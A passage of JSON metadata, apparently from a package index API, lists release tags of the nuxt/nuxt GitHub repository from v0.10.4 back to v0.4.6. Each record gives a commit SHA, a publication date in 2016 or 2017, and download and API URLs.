Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"d